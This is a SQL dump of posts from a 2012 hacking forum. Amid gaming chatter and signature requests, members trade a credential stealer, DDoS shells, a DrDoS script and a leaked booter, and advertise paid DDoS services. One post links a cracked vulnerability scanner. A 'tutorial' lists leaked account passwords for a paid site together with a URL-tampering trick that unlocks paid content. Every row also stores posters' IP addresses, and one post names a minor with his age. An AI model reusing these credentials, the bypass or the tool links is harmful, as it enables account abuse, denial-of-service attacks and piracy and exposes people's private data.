'Reloadzor! You should add me on Skype :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f8ca77ec10cd2cd05632dee113af2feb', '0', '0'); INSERT INTO mybb_posts VALUES('3120', '642', '3115', '61', 'RE: [FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '82', 'iTzIpod', '1349119270', 'Thanks for the contribution dude. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '743a39abcc7f49bfa132630f24fb41d5', '0', '0'); INSERT INTO mybb_posts VALUES('3121', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349119303', 'http://www.youtube.com/ :[ LOL @Reloadzor.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '579e7948e369f603385839a8a065af83', '0', '0'); INSERT INTO mybb_posts VALUES('3123', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349119700', 'DAMM ur all welcome :)\nand i will be posting more soon...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'a47b8ce0f9a6f19afc386ffd653306bd', '0', '0'); INSERT INTO mybb_posts VALUES('3124', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '82', 'iTzIpod', '1349120194', 'Feel free to post some stuff in Unique. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5499a1a59383a771bbbd91ed1360893f', '0', '0'); INSERT INTO mybb_posts VALUES('3125', '608', '3119', '66', 'RE: Welcome To Gamers!', '0', '62', 'R?????zo?', '1349120677', '[quote=\'iTzIpod\' pid=\'3119\' dateline=\'1349119219\']\r\nReloadzor! You should add me on Skype :3\r\n[/quote]\r\n\r\nadded you <3', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '143348ceb5b106c48ca27923f0130ee0', '0', '0'); INSERT INTO mybb_posts VALUES('3126', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349120732', 'alrighty :P\nbut i dont raelly have anything to post about yet so...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e9ffea03bd5a20e061f3937c67339f24', '0', '0'); INSERT INTO mybb_posts VALUES('3127', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '203', 'NeonLights', '1349122231', 'hmm i would love to have a new sig :3\nwith my name, green,red,yellow, and a rasta hat on the N of my name and a weed leaf in the background! :D\nif u could make me this i would shit my pants :D', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '16f9e06f0f579700d7a53f9bacdb0f69', '0', '0'); INSERT INTO mybb_posts VALUES('3128', '190', '3114', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1349122995', '[quote=\'R?????zo?\' pid=\'3114\' dateline=\'1349106126\']\r\nI follow this thread everyday waiting until someone posts a pornhub link :/\r\n[/quote]\r\n\r\nOh my god LOL\r\n\r\nMade me burst out laughing.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '2ebda1960b588831051b55542baaf403', '0', '0'); INSERT INTO mybb_posts VALUES('3129', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '203', 'NeonLights', '1349123752', 'AWSomme could i get these plz? :3', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'de9dcd73c8d369894a159a79f0994d7c', '0', '0'); INSERT INTO mybb_posts VALUES('3130', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '203', 'NeonLights', '1349123943', 'Username: NeonLights\nName: Nick\nAge: 15\nProfile: http://l33thacking.net/user-203.html\nlittle extra: im very HQ and have a positive rep \n\nwhy is hould join: well, IM SEXY, and i love to play games like mw3 and battlefield on my xbox 360 :D\nand i love to play on my computer... and im a hardcore gamer i almost play 24/7 and yea thats that :D', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e1cebf18b176364b638a258c19f6aa9b', '0', '0'); INSERT INTO mybb_posts VALUES('3131', '626', '3020', '19', '[Junk]?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349124385', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3132', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349124504', 'Exactly :p I know NXK would post one soon :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '171fffd349798cac951f5d9f15e1322d', '0', '0'); INSERT INTO mybb_posts VALUES('3133', '613', '3111', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1349124785', '[quote=\'R?????zo?\' pid=\'3111\' dateline=\'1349105223\']\r\nI mean I can try again for you if you are more specific, for free..\r\nI will animate it.\r\n[/quote]\r\n\r\nIf you\'d like to go for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'be0907b74ea096c06d34b5485ac731cd', '0', '0'); INSERT INTO mybb_posts VALUES('3134', '190', '665', '56', 'RE: Copy and paste game', '0', '100', '??zg???g????61', '1349124870', 'WTF witchcraft?!!?!?\n\n\nLOL I think I was spamming my friend that. XD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c4017aab18e71d767482e93f1dc6b542', '0', '0'); INSERT INTO mybb_posts VALUES('3135', '431', '3104', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '100', '??zg???g????61', '1349124982', '[quote=\'R?????zo?\' pid=\'3104\' dateline=\'1349098046\']\r\n[quote=\'iTzGRONgamer61\' pid=\'3000\' dateline=\'1349029835\']\r\nHeyo, could I have a sig made for myself? Could i have \"GRONgamer61\'s DDoS\'ing Service $4/Hour\", in black and red letters. I\'d like the font to look retro and shiny ;D\r\n[/quote]\r\n\r\nnot sure if you wanted something like this\r\n\r\n[img]http://i.imgur.com/b6ooB.gif[/img]\r\n\r\nI know you wanted red but it didn\'t look too good.\r\n[/quote]\r\n\r\nHoly crap. Thats an AWESOME signature, thanks a TON!!! +Rep\'d ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '349cc749f872598111517e590c38d79f', '0', '0'); INSERT INTO mybb_posts VALUES('3136', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1349126666', 'Dang it.. Me and Reloadzor have the same rep now :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '29e476cb943bd00daeb090de98034452', '0', '0'); INSERT INTO mybb_posts VALUES('3137', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349126710', 'http://www.lfpress.com/2012/10/01/shooting-victim-terrell-johnson-remembered-for-big-smile\n\nWas doing it for one of my school assignments. Current events. Had to list the links I used.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '116ca14e317549b99ea02b7b780ea65d', '0', '0'); INSERT INTO mybb_posts VALUES('3138', '453', '2129', '19', '[Junk]Instagram Bot 3.2', '0', '82', 'iTzIpod', '1349127640', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3139', '346', '1642', '19', '[Junk]Heads Up', '0', '82', 'iTzIpod', '1349127769', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3140', '422', '1936', '19', '[Junk][Read] Announcement', '0', '82', 'iTzIpod', '1349127796', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3141', '385', '1768', '19', '[Junk][Important] Discussion', '0', '82', 'iTzIpod', '1349127861', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3142', '485', '2352', '19', '[Junk][?] Switching Userbars?', '0', '82', 'iTzIpod', '1349127861', 'This thread has been junked.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3143', '644', '0', '19', '[Junk]Testing', '0', '82', 'iTzIpod', '1349127944', '[mod]Testing - iTzIpod[/mod]\r\n\r\nYeahh I\'m awesome.\n[hr]\nThis thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349127960', '1', '9522f3daca3be95c370b94ea99b1292b', '0', '0'); INSERT INTO mybb_posts VALUES('3144', '431', '3127', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1349129242', '[quote=\'NeonLights\' pid=\'3127\' dateline=\'1349122231\']\nhmm i would love to have a new sig :3\nwith my name, green,red,yellow, and a rasta hat on the N of my name and a weed leaf in the background! :D\nif u could make me this i would shit my pants :D\n[/quote]\n\n[img]http://i.imgur.com/2Ytdn.gif[/img]\n\nsomething like that bro?', '94.132.244.168', '1585771688', '1', '0', '62', '1349129260', '1', '26990360b30acedd5fe9c1e51ba7aaee', '0', '1349129260'); INSERT INTO mybb_posts VALUES('3145', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '203', 'NeonLights', '1349132315', 'HOLY FUCK YES :D but the rasta hat looks pretty shitty :P\nbut thx :D', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '72894f3515392bf42784722092ee61d9', '0', '0'); INSERT INTO mybb_posts VALUES('3146', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1349132652', 'if you get me a good rasta hat that you like .png i will fix it :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '46fa9190b3bd805d95f0913d6bdee857', '0', '0'); INSERT INTO mybb_posts VALUES('3147', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '203', 'NeonLights', '1349134523', 'ok cool :D il do that later im kinda busy now\ngotta wright a 600 word s.a -.- for school', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'ffc4e33d25bb5623aeb0097307857c01', '0', '0'); INSERT INTO mybb_posts VALUES('3148', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '100', '??zg???g????61', '1349138174', 'Love this thing, thanks for the share ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3a7870d99f12a5e709cdc296f9198e25', '0', '0'); INSERT INTO mybb_posts VALUES('3149', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '1', 't3h jok3r', '1349138405', 'I don\'t think there are any l33thackers members here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5499dd6ec7cd6e9a3a0768c75d54f9d2', '0', '0'); INSERT INTO mybb_posts VALUES('3150', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '1', 't3h jok3r', '1349138540', 'Honestly I never SE\'d Logitech. I know someone who can SE a gaming keyboard for you, I will ask them and let you know.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bbb71a2e22ac97a177d2fdc07772040e', '0', '0'); INSERT INTO mybb_posts VALUES('3151', '635', '3093', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '1', 't3h jok3r', '1349138628', '[quote=\'Anonymous™\' pid=\'3093\' dateline=\'1349085229\']\r\nIt really shows that the community is growing.\r\n[/quote]\r\n\r\nTrue and thanks to everyone who has been part of this community and helped L33THacking grow. Every post counts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6e436ab0fa67489c4485cd8ac6122c71', '0', '0'); INSERT INTO mybb_posts VALUES('3152', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '203', 'NeonLights', '1349140624', ':D glad u like it... if u have any requests just tell me il try to get it for you :)', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '5c35c2e931e75aa9c3f69b373dc4ada4', '0', '0'); INSERT INTO mybb_posts VALUES('3153', '507', '2527', '13', 'RE: New dork on vulnerabilities and view files', '0', '1', 't3h jok3r', '1349141630', 'Thanks I checked out the dork and got my hands on some very useful information.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '39db1d743af31ce45daa2eddcd5bc332', '0', '0'); INSERT INTO mybb_posts VALUES('3154', '645', '0', '30', '[GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '1', 't3h jok3r', '1349141839', '[size=medium][color=#FF0000][b]Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked ![/b][/color][/size] \n\nRelease: Acunetix.Web.Vulnerability.Scanner.CE.v8.0.20120305.Retail.Cracked-BRD\nVersion : v8.0.20120305\nOS: WinAll\nSize: 19.3 MB\n\n\n[img]http://i42.tinypic.com/s3qddl.png[/img]\n\n\n\nWorking and tested by ME! [u]DISCONNECT YOUR INTERNET BEFORE ACTIVATION![/u]\nDownload: [code]http://www.mirrorcreator.com/files/AAT59JB9/CHF_AWVS_8.rar_links[/code]\n\n[size=large][u][align=center][color=#FF0000][b]A SIMPLE THANKS WILL BE APPRECIATED[/b][/color][/align][/u][/size]', '72.231.24.165', '1223104677', '1', '0', '1', '1349141904', '1', 'a9abc235e96f08814c9c3e170ef9f422', '0', '1349141904'); INSERT INTO mybb_posts VALUES('3155', '616', '3005', '67', 'RE: [PHP] IP Grabbing Script', '0', '1', 't3h jok3r', '1349142397', 'Nice script. It\'s a old and known trick but not many newbies and school students are aware of this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '59b9f9963bac7323f315d8e32203f351', '0', '0'); INSERT INTO mybb_posts VALUES('3156', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '1', 't3h jok3r', '1349142517', 'Closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bf78a7ad11fd888c469a166cc728fe8a', '0', '0'); INSERT INTO mybb_posts VALUES('3157', '646', '0', '29', '[Tutorial] Hack RealityKing The biggest Hack!! WATCH FULL MOVIES *HOT*', '0', '5', 'Timmy', '1349142670', '[code]\r\nfsunoles-noless\r\ndfger12-empire\r\nykinaba-yk1783\r\naspeace-qwertyu8\r\npoter96-37469311\r\nwaynewrw-wayne523\r\n29hotterbc-tailgegg12\r\nmihaiiliescu-alex1511\r\ndaveCH83-1qay2wsx\r\nbclinton042-budman01\r\n[/code]\r\n\r\nhttp://members.realitykings.com/\r\n\r\nWhat those user/password?\r\n\r\nThese are passwords for RealityKings which are dead. You cannot watch or download from this account.\r\n\r\n\r\n*BUT*\r\n\r\nHere is what u can do with them:\r\n1)Enter one of the accounts I gave you up.\r\n2)Choose what sites u want to show/what video\r\n3)After u choose site enter to video u want to show\r\n4)click on WATCH FULL MOVIE\r\n\r\nok now its goes like this u have the link above up click it and copy it\r\n\r\nIt needs to look like this for example:\r\n\r\n[code]\r\nmembers.realitykings.com/?a=update.movie&site=streetblowjobs&id=8290\r\n[/code]\r\n\r\nafter u copy u write after movie_hd\r\n\r\nExample:\r\n[quote]\r\nmembers.realitykings.com/?a=update.movie_[color=#1E90FF]hd[/color]&site=streetblowjobs&id=8290\r\n[/quote]\r\n\r\nu see what i did?\r\n/?a=update.movie_hd\r\n\r\nPicture:\r\nhttp://imageshack.us/photo/my-images/17/10492096.png/\r\n\r\nGood luck!! :-)\r\n\r\nCredits: Kamito', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5350d7a4ceca7fbe7c76b83f005476ef', '0', '0'); INSERT INTO mybb_posts VALUES('3158', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '5', 'Timmy', '1349142786', 'Congratz LH on 3K posts. Our next milestone should be 1K threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6edbb484781141c5c551d0183ad97d1', '0', '0'); INSERT INTO mybb_posts VALUES('3159', '589', '3124', '15', 'RE: Crime24 Stealer', '0', '5', 'Timmy', '1349142899', '[quote=\'iTzIpod\' pid=\'3124\' dateline=\'1349120194\']\r\nFeel free to post some stuff in Unique. :D\r\n[/quote]\r\n\r\nI disagree because if all the good content is in the Unique forum then they won\'t be activity in the main public forums which will drop L33Thackings activity and members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0028b17637011ad1e01da4c7e45e2dc9', '0', '0'); INSERT INTO mybb_posts VALUES('3160', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349143129', 'kamito\n\nI was giving someone credits so I copied the username.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5495896ac0651d586bb541695e235d42', '0', '0'); INSERT INTO mybb_posts VALUES('3161', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1349143147', 'testing to see if my\nsig works having problems', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '17de725e1dd379241273e58f25281991', '0', '0'); INSERT INTO mybb_posts VALUES('3162', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '82', 'iTzIpod', '1349143247', 'Yeah. And our next goal for posts is probably 5k. But we\'re still gonna make a 4k thread achievement. Since it boosts up our total threads.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c795c40ca97a91568548c2dba66e60c9', '0', '0'); INSERT INTO mybb_posts VALUES('3163', '641', '3113', '42', 'RE: File-Sharing for Personal Use Declared Legal in Portugal', '0', '5', 'Timmy', '1349143265', 'The introduction has been copied and pasted twice.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20b00087d68a123c69111f42cc2134f1', '0', '0'); INSERT INTO mybb_posts VALUES('3164', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349143304', 'l33thacking.net\n\nLool was trying to advertise our forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd9b20288c222754e9e521b829b3319f', '0', '0'); INSERT INTO mybb_posts VALUES('3165', '629', '3047', '21', 'RE: [FREE] Giving Away DrDos Script [FREE]', '0', '5', 'Timmy', '1349143306', 'Nice signature and can I have this please? PMing you now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '305d8f7c4024ae1ca7dca5dd568c4bde', '0', '0'); INSERT INTO mybb_posts VALUES('3166', '496', '2408', '14', 'RE: Free Proxy List', '0', '5', 'Timmy', '1349143366', 'Quite funny that this only has two views lol. Thanks for the list.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6689d6ca12099b5a0d2aba8cd6132df', '0', '0'); INSERT INTO mybb_posts VALUES('3167', '647', '0', '14', 'VPNReactor (Free/Paid) **Deletes Logs**', '0', '5', 'Timmy', '1349143704', '[b]Protect your privacy on the internet - FREE[/b]\r\n[list]\r\n[*]Free easy-to-use App for Windows and Mac\r\n[*]Works on all platforms, Windows, Mac OSX, Iphone etc.\r\n[*]256-Bit Encrypted connection between you and the internet\r\n[*]Total Privacy, no records of your internet activities are kept\r\n[*]US, UK, & Europe based VPN Servers\r\n[*]Unlimited Bandwidth - No speed caps!\r\n[*]Instant Access\r\n[*]FREE!!\r\n[/list]\r\n\r\nVPNReactor is a good VPN, free and deletes logs in 2 weeks. It\'s fast plus easy to setup. In paid version you can connect anywhere you want and doesn\'t keep logs at all.\r\n\r\nLink: https://www.vpnreactor.com/default.aspx', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5c8760bd789075d601275154faf0da46', '0', '0'); INSERT INTO mybb_posts VALUES('3168', '634', '3075', '7', 'RE: Depressed', '0', '5', 'Timmy', '1349143773', 'Sorry I don\'t know how it feels but all i can say is move on, stay strong and good luck with life.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8b6107256c3123db0a82977cca6a1bf3', '0', '0'); INSERT INTO mybb_posts VALUES('3169', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1349143784', 'Are you talking about the thread? O_o\n\n\nNo problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b6479f2954506e4ae19a2d37cd1c1bd', '0', '0'); INSERT INTO mybb_posts VALUES('3170', '253', '1106', '56', 'RE: Count to 200', '0', '5', 'Timmy', '1349143812', '23. Lets finish this game already.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '275cb23c41525eaa89290635157e57d2', '0', '0'); INSERT INTO mybb_posts VALUES('3171', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349143846', 'https://www.vpnreactor.com/default.aspx', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '54ce4e60507e2472c0fe61942bcf404d', '0', '0'); INSERT INTO mybb_posts VALUES('3172', '648', '0', '19', '[Junk]Testing', '0', '82', 'iTzIpod', '1349143901', 'Testing.\r\n\r\n[Mod] I\'m cool [/mod]\r\n\r\nTesting.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4babc4a3e0988c76182f353680eb8ebb', '0', '0'); INSERT INTO mybb_posts VALUES('3173', '539', '3161', '4', 'RE: YO WHAT UP!', '0', '1', 't3h jok3r', '1349143929', '[quote=\'NeonLights\' pid=\'3161\' dateline=\'1349143147\']\r\ntesting to see if my\r\nsig works having problems\r\n[/quote]\r\n\r\nI can see your signature. Try clearing your cache.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ddb2d91707cf2ca3363303d07b7b102d', '0', '0'); INSERT INTO mybb_posts VALUES('3174', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349143952', 'http://i.minus.com/ib1w4ZB084LUHN.jpg \n\nMy sig :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc23c46b5831419c9c10f3b50da74054', '0', '0'); INSERT INTO mybb_posts VALUES('3175', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349143989', '24. Yeah agreed with Timmy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a9d5c0c0f0742d4d44da3bc371f3188d', '0', '0'); INSERT INTO mybb_posts VALUES('3176', '648', '3172', '19', 'RE: Testing', '0', '1', 't3h jok3r', '1349144005', 'May I know what\'s this thread doing here? We have a Mods testing forum and mostly test threads belong in the off topic forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '56bd901c0d47be210537bc2f68e0df06', '0', '0'); INSERT INTO mybb_posts VALUES('3177', '648', '3172', '19', 'RE: Testing', '0', '82', 'iTzIpod', '1349144129', 'I\'m trying to test my Moderation tools in this section. Sorry. Before it didn\'t work. Kept leading me to an error.\n[hr]\nThis thread has been junked.', '24.212.197.164', '416597412', '1', '0', '82', '1349144138', '1', '3b7ce975e87ec59cb25132f29b60d791', '0', '0'); INSERT INTO mybb_posts VALUES('3178', '645', '3154', '30', 'RE: [GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '2', 'Apathy', '1349144679', 'You have tested personally?', '173.206.138.218', '-1378972966', '0', '0', '0', '0', '1', '640c299d8da304e37c2354034f847c0b', '0', '0'); INSERT INTO mybb_posts VALUES('3179', '649', '0', '3', 'Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349144845', 'I have attached a picture in this thread which shows our monthly statistics. I\'m glad that September beat Augusts posting activity.\r\n\r\nWe are going good this month as we have 90 posts and 14 threads already (Excluding this thread)\r\n\r\nP.S: June was when LH was made so moderations were going on and we had no members so exclude June from the list. \r\n\r\n[u]Sincere thanks for the following members[/u]\r\n\r\n[url=http://l33thacking.net/user-82.html]iTzIpod[/url]\r\n[url=http://l33thacking.net/user-199.html]Anonymous™[/url]\r\n[url=http://l33thacking.net/user-100.html]iTzGRONgamer61[/url]\r\n[url=http://l33thacking.net/user-205.html]mothered[/url]\r\n[url=http://l33thacking.net/user-203.html]NeonLights[/url]\r\n[url=http://l33thacking.net/user-61.html]NXK[/url]\r\n[url=http://l33thacking.net/user-62.html]R?????zo?[/url]\r\n[url=http://l33thacking.net/user-5.html]Timmy[/url]\r\n[url=http://l33thacking.net/user-112.html]??????Z[/url]\r\n[url=http://l33thacking.net/user-4.html]Triple H[/url]\r\n[url=http://l33thacking.net/user-8.html]Spacefish36[/url]\r\n[url=http://l33thacking.net/user-9.html]p420[/url]\r\n[url=http://l33thacking.net/user-10.html]swa4567[/url]\r\n\r\nThanks to people that are away or banned.\r\n\r\n[url=http://l33thacking.net/user-20.html]JakeUS[/url]\r\n[url=http://l33thacking.net/user-67.html]HoverCatz[/url]\r\n[url=http://l33thacking.net/user-53.html]sirchamp[/url]\r\n[url=http://l33thacking.net/user-54.html]Sin Cara[/url]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7191945e78f293874cb2f6ee73423f4a', '0', '0'); INSERT INTO mybb_posts VALUES('3180', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '82', 'iTzIpod', '1349145283', 'First day of October. 90 Posts. Not a bad start. 90x31=2790! :D \n\nThreads will be boosted in Unique. Imma be spamming posts + threads. (HQ obviously). Check em out.\n\nNot in Unique?\n\nToo bad. Try to be HQ, or apply.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3e98ac568d84ebb471f4cc1f6333c488', '0', '0'); INSERT INTO mybb_posts VALUES('3181', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349146018', 'I don\'t need to be in unique because I am unique and I can view your forum already so...', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b9c589b6f55e440c46d2c3a1ee25062d', '0', '0'); INSERT INTO mybb_posts VALUES('3182', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1349146067', '25. 175 left to go :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ee82680b8b6f092a493636243640534a', '0', '0'); INSERT INTO mybb_posts VALUES('3183', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1349147246', 'Just for an update. I have planned all the forums, sub-forums, name, ficons and descriptions. So the gaming section will be out soon but please refer your gaming friends over here. I\'m also planning to add a forum to get all the cheats, walk-through and codes. The only special gaming forum we will have will be Minecraft other than that we will have forums such as consoles, online gaming, lounge, cheats, mobile gaming etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b15d8e9ce67a49934cc4f76ab5e78b89', '0', '0'); INSERT INTO mybb_posts VALUES('3184', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1349147323', 'To let everyone know that I have tried every possible way to center the logo but it didn\'t work. The theme we are on has a lot of bugs and issues and overtime I have fixed them all. I need more time.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e6118d9c853f990d140c3185a6c4ce94', '0', '0'); INSERT INTO mybb_posts VALUES('3185', '529', '2660', '49', 'RE: [Suggestion] A or B Section', '0', '1', 't3h jok3r', '1349147406', 'Closing this thread due to no votes. Create 2-4 A or B threads in the Lounge and I\'ll see if they are active or not.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a1041f02553330ec74b5b25441c43a53', '0', '0'); INSERT INTO mybb_posts VALUES('3186', '253', '1106', '56', 'RE: Count to 200', '0', '199', 'Anonymous™', '1349166759', '26. Almost 200 now! -> :D', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '0ef85f029442c715c95eec9770d5516a', '0', '0'); INSERT INTO mybb_posts VALUES('3187', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349166888', 'http://www.youtube.com/watch?v=PVzljDmoPVs&feature=g-logo-xit - David Guetta - She Wolf (Falling to Pieces) ft. Sia', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'a8faf5a3efcb62302ce703034c8dcc9c', '0', '0'); INSERT INTO mybb_posts VALUES('3188', '488', '2355', '8', 'RE: What are you listening to?', '0', '199', 'Anonymous™', '1349166948', 'David Guetta - She Wolf (Falling to Pieces) ft. Sia', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'bd4a1702b220b83b214bba241aeee5c7', '0', '0'); INSERT INTO mybb_posts VALUES('3189', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '199', 'Anonymous™', '1349167070', 'Thanks, I\'ll write some more tuts later today!', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '20d1faf23ba5aa77fb98e8e2e31bdfd6', '0', '0'); INSERT INTO mybb_posts VALUES('3190', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '199', 'Anonymous™', '1349167471', '[b]Username:[/b] Anonymous™\n[b]Name:[/b] Jacob\n[b]Age:[/b] 16\n[b]Profile:[/b] http://l33thacking.net/user-199.html\n[b]Why I should join Gamers: [/b] I love to play games I\'m a hardcore gamer, I play maybe 20 hours and sleeps four, I like to play on both consoles and PC.\n\n\nSorry for LQ but I have not much time do you want to know something more or have more HQ answers PM me.', '85.230.50.38', '1441149478', '1', '0', '199', '1349167515', '1', 'd583611090e59aad9286c08dc29d77ba', '0', '1349167515'); INSERT INTO mybb_posts VALUES('3191', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '199', 'Anonymous™', '1349185688', 'I\'ve never heard of it so who knows?', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'ebb4ed62b0e55e794cd9f578ead3fa28', '0', '0'); INSERT INTO mybb_posts VALUES('3192', '629', '3047', '21', 'RE: [FREE] Giving Away DrDos Script [FREE]', '0', '100', '??zg???g????61', '1349187731', 'Sent you it ;D Happy DDoS\'ing', '46.249.57.80', '788085072', '1', '0', '0', '0', '1', '99c13091190e4b1478489b80989fee1b', '0', '0'); INSERT INTO mybb_posts VALUES('3193', '650', '0', '61', '[LEAK] ShockwaveBooter (V4.2) [FREE]', '8', '100', '??zg???g????61', '1349189593', 'ShockwaveBooter (V4.2), ADD YOUR OWN SHELLS!!!\r\n\r\nLeaked this from HF, its a paid booter ;D enjoy!!\r\n\r\n[url=https://www.virustotal.com/file/133c47d6d23efeb06b370a6b208e0aede0bf8f2412a1aede547c68e45dd5f18d/analysis/]Virus Scan[/url]\r\n\r\n[url=http://adf.ly/DMlkF]Download[/url]', '46.249.57.80', '788085072', '1', '0', '0', '0', '1', 